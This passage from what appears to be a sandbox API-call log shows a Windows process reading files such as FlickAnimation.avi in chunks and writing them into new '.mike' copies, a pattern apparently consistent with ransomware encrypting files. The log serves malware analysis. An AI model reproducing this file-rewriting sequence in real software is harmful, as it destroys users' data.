lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml.mike", lpFilePart=0x0) returned 0x43 [0042.971] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0042.971] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\content.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.971] GetFileType (hFile=0x264) returned 0x1 [0042.971] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0042.971] GetFileType (hFile=0x264) returned 0x1 [0042.971] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x5220 [0042.971] WriteFile (in: hFile=0x264, lpBuffer=0x20ea3c4*, nNumberOfBytesToWrite=0x19b0, lpNumberOfBytesWritten=0x2af0dc, lpOverlapped=0x0 | out: lpBuffer=0x20ea3c4*, lpNumberOfBytesWritten=0x2af0dc*=0x19b0, lpOverlapped=0x0) returned 1 [0042.971] CloseHandle (hObject=0x264) returned 1 [0042.972] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb50, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml.mike", lpFilePart=0x0) returned 0x43 [0042.972] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af044) returned 1 [0042.972] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\content.xml.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.972] GetFileType (hFile=0x264) returned 0x1 [0042.972] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af040) returned 1 [0042.972] GetFileType (hFile=0x264) returned 0x1 [0042.973] WriteFile (in: hFile=0x264, lpBuffer=0x20ee0ac*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0ec, lpOverlapped=0x0 | out: lpBuffer=0x20ee0ac*, lpNumberOfBytesWritten=0x2af0ec*=0x20c, lpOverlapped=0x0) returned 1 [0042.973] CloseHandle (hObject=0x264) returned 1 [0042.974] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml", nBufferLength=0x105, lpBuffer=0x2aecb4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml", lpFilePart=0x0) returned 0x3e [0042.974] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml.mike", lpFilePart=0x0) returned 0x43 [0042.974] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0042.974] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\content.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af1b4 | out: lpFileInformation=0x2af1b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe3ca06a0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe3ca06a0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe3d12ac0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x6bd0)) returned 1 [0042.974] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0042.974] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml", nBufferLength=0x105, lpBuffer=0x2aecb4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml", lpFilePart=0x0) returned 0x3e [0042.975] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml.mike", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml.mike", lpFilePart=0x0) returned 0x43 [0042.975] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0042.975] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\content.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x20ef76c | out: lpFileInformation=0x20ef76c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe3ca06a0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe3ca06a0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe3d12ac0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x6bd0)) returned 1 [0042.975] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0042.975] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml", nBufferLength=0x105, lpBuffer=0x2aec58, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml", lpFilePart=0x0) returned 0x3e [0042.975] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml", dwFileAttributes=0x80) returned 0 [0042.976] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml", nBufferLength=0x105, lpBuffer=0x2aebec, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml", lpFilePart=0x0) returned 0x3e [0042.976] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec10, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml.mike", lpFilePart=0x0) returned 0x43 [0042.976] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af070) returned 1 [0042.976] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\content.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af0ec | out: lpFileInformation=0x2af0ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe3ca06a0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe3ca06a0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe3d12ac0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x6bd0)) returned 1 [0042.976] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af06c) returned 1 [0042.976] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml", nBufferLength=0x105, lpBuffer=0x2aebec, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml", lpFilePart=0x0) returned 0x3e [0042.976] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml.mike", lpFilePart=0x0) returned 0x43 [0042.976] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\content.xml.mike")) returned 1 [0042.977] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ConvertInkStore.exe", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ConvertInkStore.exe", lpFilePart=0x0) returned 0x46 [0042.977] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi", lpFilePart=0x0) returned 0x45 [0042.977] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi", lpFilePart=0x0) returned 0x45 [0042.978] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi", nBufferLength=0x105, lpBuffer=0x2aec28, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi", lpFilePart=0x0) returned 0x45 [0042.978] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af11c) returned 1 [0042.978] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0042.979] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2adf58) returned 1 [0042.979] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi", nBufferLength=0x105, lpBuffer=0x2aeb60, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi", lpFilePart=0x0) returned 0x45 [0042.979] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af054) returned 1 [0042.979] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.979] GetFileType (hFile=0x264) returned 0x1 [0042.979] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af050) returned 1 [0042.979] GetFileType (hFile=0x264) returned 0x1 [0042.979] CloseHandle (hObject=0x264) returned 1 [0042.980] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi", lpFilePart=0x0) returned 0x45 [0042.980] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi", lpFilePart=0x0) returned 0x45 [0042.980] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x2aec5c, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0042.980] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1b0) returned 1 [0042.980] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0042.980] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1ac) returned 1 [0042.980] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0042.980] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi"), fInfoLevelId=0x0, lpFileInformation=0x20f3274 | out: lpFileInformation=0x20f3274*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x92f4e4a1, ftCreationTime.dwHighDateTime=0x1c9ea0f, ftLastAccessTime.dwLowDateTime=0x92f4e4a1, ftLastAccessTime.dwHighDateTime=0x1c9ea0f, ftLastWriteTime.dwLowDateTime=0x92f9a75d, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x186b84)) returned 1 [0042.980] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0042.980] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi", lpFilePart=0x0) returned 0x45 [0042.980] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0042.980] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi"), fInfoLevelId=0x0, lpFileInformation=0x20f3594 | out: lpFileInformation=0x20f3594*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x92f4e4a1, ftCreationTime.dwHighDateTime=0x1c9ea0f, ftLastAccessTime.dwLowDateTime=0x92f4e4a1, ftLastAccessTime.dwHighDateTime=0x1c9ea0f, ftLastWriteTime.dwLowDateTime=0x92f9a75d, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x186b84)) returned 1 [0042.980] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0042.981] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi", nBufferLength=0x105, lpBuffer=0x2aecb4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi", lpFilePart=0x0) returned 0x45 [0042.981] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike", lpFilePart=0x0) returned 0x4a [0042.981] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0042.981] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af1b4 | out: lpFileInformation=0x2af1b4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0042.981] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0042.981] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi", nBufferLength=0x105, lpBuffer=0x2aecb8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi", lpFilePart=0x0) returned 0x45 [0042.981] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi", lpFilePart=0x0) returned 0x45 [0042.981] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi", nBufferLength=0x105, lpBuffer=0x2aec3c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi", lpFilePart=0x0) returned 0x45 [0042.981] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike", nBufferLength=0x105, lpBuffer=0x2aec40, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike", lpFilePart=0x0) returned 0x4a [0042.981] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a0) returned 1 [0042.981] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af11c | out: lpFileInformation=0x2af11c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0042.981] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af09c) returned 1 [0042.981] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike", lpFilePart=0x0) returned 0x4a [0042.981] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0042.981] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.982] GetFileType (hFile=0x264) returned 0x1 [0042.982] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0042.982] GetFileType (hFile=0x264) returned 0x1 [0042.982] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x0 [0042.982] WriteFile (in: hFile=0x264, lpBuffer=0x20f4418*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af0bc, lpOverlapped=0x0 | out: lpBuffer=0x20f4418*, lpNumberOfBytesWritten=0x2af0bc*=0x220, lpOverlapped=0x0) returned 1 [0042.983] CloseHandle (hObject=0x264) returned 1 [0042.983] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0e8) returned 1 [0042.983] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi"), fInfoLevelId=0x0, lpFileInformation=0x20f3f0c | out: lpFileInformation=0x20f3f0c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x92f4e4a1, ftCreationTime.dwHighDateTime=0x1c9ea0f, ftLastAccessTime.dwLowDateTime=0x92f4e4a1, ftLastAccessTime.dwHighDateTime=0x1c9ea0f, ftLastWriteTime.dwLowDateTime=0x92f9a75d, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x186b84)) returned 1 [0042.983] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e4) returned 1 [0042.983] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi", lpFilePart=0x0) returned 0x45 [0042.983] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0042.983] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.983] GetFileType (hFile=0x264) returned 0x1 [0042.984] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0042.984] GetFileType (hFile=0x264) returned 0x1 [0042.984] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x0 [0042.984] ReadFile (in: hFile=0x264, lpBuffer=0x20f554c, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x20f554c*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0042.985] CloseHandle (hObject=0x264) returned 1 [0042.986] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike", lpFilePart=0x0) returned 0x4a [0042.987] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0042.987] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.987] GetFileType (hFile=0x264) returned 0x1 [0042.987] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0042.987] GetFileType (hFile=0x264) returned 0x1 [0042.987] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x220 [0042.987] WriteFile (in: hFile=0x264, lpBuffer=0x20ffab4*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af0dc, lpOverlapped=0x0 | out: lpBuffer=0x20ffab4*, lpNumberOfBytesWritten=0x2af0dc*=0x2800, lpOverlapped=0x0) returned 1 [0042.987] CloseHandle (hObject=0x264) returned 1 [0042.988] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi", lpFilePart=0x0) returned 0x45 [0042.988] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0042.988] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.988] GetFileType (hFile=0x264) returned 0x1 [0042.988] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0042.988] GetFileType (hFile=0x264) returned 0x1 [0042.988] SetFilePointer (in: hFile=0x264, lDistanceToMove=10240, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x2800 [0042.988] ReadFile (in: hFile=0x264, lpBuffer=0x2102524, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x2102524*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0042.988] CloseHandle (hObject=0x264) returned 1 [0042.989] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike", lpFilePart=0x0) returned 0x4a [0042.989] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0042.989] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.989] GetFileType (hFile=0x264) returned 0x1 [0042.989] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0042.989] GetFileType (hFile=0x264) returned 0x1 [0042.989] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x2a20 [0042.989] WriteFile (in: hFile=0x264, lpBuffer=0x210ca8c*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af0dc, lpOverlapped=0x0 | out: lpBuffer=0x210ca8c*, lpNumberOfBytesWritten=0x2af0dc*=0x2800, lpOverlapped=0x0) returned 1 [0042.990] CloseHandle (hObject=0x264) returned 1 [0042.990] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi", lpFilePart=0x0) returned 0x45 [0042.991] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0042.991] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.991] GetFileType (hFile=0x264) returned 0x1 [0042.991] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0042.991] GetFileType (hFile=0x264) returned 0x1 [0042.991] SetFilePointer (in: hFile=0x264, lDistanceToMove=20480, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x5000 [0042.991] ReadFile (in: hFile=0x264, lpBuffer=0x210f4fc, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x210f4fc*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0042.991] CloseHandle (hObject=0x264) returned 1 [0042.992] 